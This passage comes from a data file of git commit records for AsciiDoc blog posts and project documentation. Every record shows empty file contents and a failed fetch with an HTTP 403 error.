403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16301e2acd9b37675dffbfa03847f0b00e0c34a7","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f8d29c872cf049a39d2665ad85cb67e225cecae","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"503df75f11e5405a4d5d3a34b0d21cb5682d5489","subject":"Updating Contributing doc","message":"Updating Contributing doc","repos":"appsuite\/oss-httpd-build,appsuite\/oss-httpd-build","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appsuite\/oss-httpd-build.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b39029367977c72d98ef53751dacbd5ec10b92c0","subject":"Update 2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","message":"Update 2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","new_file":"_posts\/2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4fef1d7dff6b10e3f8af89f1c01538a2fca1443","subject":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","message":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31b15ec09ffa3fb6a195371aafac77d06caf54b","subject":"y2b create post Note 5 Unboxing \\\/ To Note Or Not?","message":"y2b create post Note 5 Unboxing \\\/ To Note Or Not?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-21-Note-5-Unboxing--To-Note-Or-Not.adoc","new_file":"_posts\/2015-08-21-Note-5-Unboxing--To-Note-Or-Not.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5b001841364d7521c2adaab40213f54ed30e31","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a325216f19277d4191c97afee1c66f82d056f9dc","subject":"Add RELEASE.adoc","message":"Add RELEASE.adoc\n\nCloses gh-9627\n","repos":"jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,rwinch\/spring-security,djechelon\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,jgrandja\/spring-security","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25ba588fe835f36d7f8d04e58bc091c10dead4fc","subject":"Update 2015-10-22-.adoc","message":"Update 2015-10-22-.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-22-.adoc","new_file":"_posts\/2015-10-22-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b6f72b786c0c9cce84de41344c5338f7c723fd4","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b86dec0bc194439f3c0c3e3faf3050e87f916b4","subject":"Update 2016-08-09.adoc","message":"Update 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09.adoc","new_file":"_posts\/2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15224693346d7a0caffd4396760b681cb21c4d9f","subject":"Faster Compilation\/Runtime and Spec Caching Fixes","message":"Faster Compilation\/Runtime and Spec Caching Fixes\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-06-26-faster-compilation-runtime-and-spec-caching-fixes.adoc","new_file":"content\/news\/2017-06-26-faster-compilation-runtime-and-spec-caching-fixes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"451f2a4c39ece8253a38c4f3fa5dcc17c0cd8aa1","subject":"Update 2015-07-22-Blog-Title.adoc","message":"Update 2015-07-22-Blog-Title.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Blog-Title.adoc","new_file":"_posts\/2015-07-22-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae8f10445c1ab3c2463a2b0f9fc51a890bc91246","subject":"Update 2015-09-15-Blog-Title.adoc","message":"Update 2015-09-15-Blog-Title.adoc","repos":"caglarsayin\/hubpress,caglarsayin\/hubpress,caglarsayin\/hubpress","old_file":"_posts\/2015-09-15-Blog-Title.adoc","new_file":"_posts\/2015-09-15-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caglarsayin\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6f2040cfac9c2142754915b5beea6ed209319a","subject":"Update 2016-04-07-2016-04-06.adoc","message":"Update 2016-04-07-2016-04-06.adoc","repos":"nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io","old_file":"_posts\/2016-04-07-2016-04-06.adoc","new_file":"_posts\/2016-04-07-2016-04-06.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nichijo-chuka\/nichijo-chuka.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bdf98c89034d424f93222a47de2a7240f572116","subject":"Update bean validation article to use FW8 APIs (#10387)","message":"Update bean validation article to use FW8 APIs (#10387)\n\nSuggested by [Jean-Christophe Gueriaud](https:\/\/vaadin.com\/forum\/#!\/thread\/16876180).\n\nCloses #10386","repos":"mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework","old_file":"documentation\/articles\/UsingBeanValidationToValidateInput.asciidoc","new_file":"documentation\/articles\/UsingBeanValidationToValidateInput.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfc9406d5cc25b46188be5e4124af1835cdec2fe","subject":"first page on upcoming full documentation","message":"first page on upcoming full documentation\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/getting-started.asciidoc","new_file":"docs\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"9f5c59e2af99e3410a41c709d166a14f64746da4","subject":"High-level documentation","message":"High-level documentation","repos":"Enterprise-Content-Management\/infoarchive-sip-sdk,kovaloid\/infoarchive-sip-sdk","old_file":"yaml\/README.adoc","new_file":"yaml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Enterprise-Content-Management\/infoarchive-sip-sdk.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"0b250e073c88509128086c83ddaba457a4c8e3db","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c55170537e70ddc0c437295ba29e685109a4149","subject":"y2b create post 5 Cool Gadgets Under $10","message":"y2b create post 5 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-07-5-Cool-Gadgets-Under-10.adoc","new_file":"_posts\/2017-05-07-5-Cool-Gadgets-Under-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4381c62504fb0bf207720f6e51f26478d4b53a3e","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a326dd5988d5d0c42d83df96abc4948795ac5994","subject":"Update 2016-01-11-new.adoc","message":"Update 2016-01-11-new.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-11-new.adoc","new_file":"_posts\/2016-01-11-new.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3161e64a904f04c11fff741bdf2fd389c617ff65","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5f0b176122d133e6a37db6cb0589e783f56f8b0","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce220363ec3ec9fc3e0e49d7c5bb439f4aca1b3","subject":"Update 2015-08-06-TO-DELETE.adoc","message":"Update 2015-08-06-TO-DELETE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-TO-DELETE.adoc","new_file":"_posts\/2015-08-06-TO-DELETE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80fb3552cd448cb3eeb7bb25cd0a881752435760","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"466b2240a27de304d4858a7365cb399575c58982","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e109217fd98e46105966441f282aefe51e44a773","subject":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e5f45e57e832fb5d0f0f26ac9c0aac8bcb5a17a","subject":"change some lines","message":"change some lines\n","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46200a1ecd593d2233aee61aff52e553f1b6bbda","subject":"Update 2016-03-28-asciidoc-ghpages-travis-docker.adoc","message":"Update 2016-03-28-asciidoc-ghpages-travis-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2203e86a8923684b664778e167a8f8a900d8d34","subject":"Update 2016-04-18-You-Might-Not-Need-j-Querry.adoc","message":"Update 2016-04-18-You-Might-Not-Need-j-Querry.adoc","repos":"Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck","old_file":"_posts\/2016-04-18-You-Might-Not-Need-j-Querry.adoc","new_file":"_posts\/2016-04-18-You-Might-Not-Need-j-Querry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lukas238\/the-holodeck.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a21da260b9d42fb8334984abdebb4ab9f195740","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice bis.adoc","new_file":"Dev tools\/Exercice bis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f149552cc71a3259574ae27555628b50d1bbea44","subject":"Document vintage @Test (#66)","message":"Document vintage @Test (#66)\n\nDocument adaption of vintage @Test annotation (#19 \/ #66)\r\n\r\nThis feature was developed as part of JUnit Io - only the docs were\r\nmissing.\r\n","repos":"CodeFX-org\/junit-io,nicolaiparlog\/junit-pioneer","old_file":"docs\/vintage-test.adoc","new_file":"docs\/vintage-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaiparlog\/junit-pioneer.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0fa11e7df72ad7f600f938da5e4f2cb38e6429ca","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3642adaa4597bcac999f560a21f4c52d2fed31e","subject":"Update 2016-04-02-J-S-Learners-Fieldguide.adoc","message":"Update 2016-04-02-J-S-Learners-Fieldguide.adoc","repos":"metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/hubpress.io","old_file":"_posts\/2016-04-02-J-S-Learners-Fieldguide.adoc","new_file":"_posts\/2016-04-02-J-S-Learners-Fieldguide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b31d260c683808733816ea25477d2808b74f26c4","subject":"Added SetBody EIP docs","message":"Added SetBody EIP docs\n","repos":"punkhorn\/camel-upstream,jonmcewen\/camel,snurmine\/camel,alvinkwekel\/camel,CodeSmell\/camel,snurmine\/camel,dmvolod\/camel,akhettar\/camel,nicolaferraro\/camel,onders86\/camel,mcollovati\/camel,onders86\/camel,anoordover\/camel,adessaigne\/camel,adessaigne\/camel,DariusX\/camel,gnodet\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,cunningt\/camel,gnodet\/camel,curso007\/camel,tdiesler\/camel,cunningt\/camel,pmoerenhout\/camel,christophd\/camel,ullgren\/camel,anoordover\/camel,gautric\/camel,anoordover\/camel,cunningt\/camel,christophd\/camel,jamesnetherton\/camel,jamesnetherton\/camel,cunningt\/camel,apache\/camel,sverkera\/camel,pax95\/camel,kevinearls\/camel,zregvart\/camel,pmoerenhout\/camel,ullgren\/camel,ullgren\/camel,gnodet\/camel,alvinkwekel\/camel,anoordover\/camel,jonmcewen\/camel,jonmcewen\/camel,mcollovati\/camel,CodeSmell\/camel,dmvolod\/camel,tdiesler\/camel,tdiesler\/camel,sverkera\/camel,onders86\/camel,christophd\/camel,gautric\/camel,kevinearls\/camel,nikhilvibhav\/camel,gautric\/camel,akhettar\/camel,alvinkwekel\/camel,DariusX\/camel,nicolaferraro\/camel,mcollovati\/camel,christophd\/camel,onders86\/camel,davidkarlsen\/camel,akhettar\/camel,cunningt\/camel,christophd\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,snurmine\/camel,nikhilvibhav\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,jamesnetherton\/camel,gautric\/camel,apache\/camel,adessaigne\/camel,curso007\/camel,pax95\/camel,tadayosi\/camel,pmoerenhout\/camel,Fabryprog\/camel,gnodet\/camel,sverkera\/camel,DariusX\/camel,tadayosi\/camel,Fabryprog\/camel,jamesnetherton\/camel,snurmine\/camel,jonmcewen\/camel,zregvart\/camel,tadayosi\/camel,nikhilvibhav\/camel,sverkera\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,kevinearls\/camel,jonmcewen\/camel,jamesnetherton\/camel,alvinkwekel\/camel,adessaigne\/camel,davidkarlsen\/camel,pax95\/camel,kevinearls\/camel,apache\/camel,nicolaferraro\/camel,sverkera\/camel,objectiser\/camel,pax95\/camel,ullgren\/camel,gautric\/camel,onders86\/camel,anoordover\/camel,akhettar\/camel,kevinearls\/camel,jonmcewen\/camel,DariusX\/camel,apache\/camel,akhettar\/camel,dmvolod\/camel,tadayosi\/camel,dmvolod\/camel,objectiser\/camel,zregvart\/camel,adessaigne\/camel,tdiesler\/camel,pmoerenhout\/camel,curso007\/camel,curso007\/camel,Fabryprog\/camel,kevinearls\/camel,christophd\/camel,anoordover\/camel,snurmine\/camel,pmoerenhout\/camel,snurmine\/camel,apache\/camel,zregvart\/camel,pax95\/camel,nicolaferraro\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,CodeSmell\/camel,dmvolod\/camel,davidkarlsen\/camel,mcollovati\/camel,Fabryprog\/camel,adessaigne\/camel,curso007\/camel,objectiser\/camel,objectiser\/camel,onders86\/camel,sverkera\/camel,akhettar\/camel,gautric\/camel,punkhorn\/camel-upstream,curso007\/camel,dmvolod\/camel,pmoerenhout\/camel,tdiesler\/camel,apache\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setBody-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setBody-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09534ebcbdd0b43c0887361113e8ec2c58ad5ce0","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Component Object Model keys.asciidoc","new_file":"documentation\/Component Object Model keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a8bacb9a8de719d78ab1cfbcfad85e6e3a5e953","subject":"Update 2016-07-15-Test.adoc","message":"Update 2016-07-15-Test.adoc","repos":"SingularityMatrix\/SingularityMatrix.github.io,SingularityMatrix\/SingularityMatrix.github.io,SingularityMatrix\/SingularityMatrix.github.io,SingularityMatrix\/SingularityMatrix.github.io","old_file":"_posts\/2016-07-15-Test.adoc","new_file":"_posts\/2016-07-15-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SingularityMatrix\/SingularityMatrix.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97880f2ea964308164f49c7c9ac6849ffe19a7f","subject":"Update 2019-01-23-C-P-P.adoc","message":"Update 2019-01-23-C-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-23-C-P-P.adoc","new_file":"_posts\/2019-01-23-C-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49ce9e7f06c6677271d30b6b9b4e386c85d7e2f5","subject":"Add build instructions. Fixes #75","message":"Add build instructions. Fixes #75\n","repos":"griffon\/griffon,griffon\/griffon","old_file":"BUILDING.adoc","new_file":"BUILDING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/griffon\/griffon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2dff06ff7f217bea892e9402d4980d55d6b7d511","subject":"Update 2015-02-24-Test.adoc","message":"Update 2015-02-24-Test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Test.adoc","new_file":"_posts\/2015-02-24-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc767b42d240ac192badd7400703737ba59aef31","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 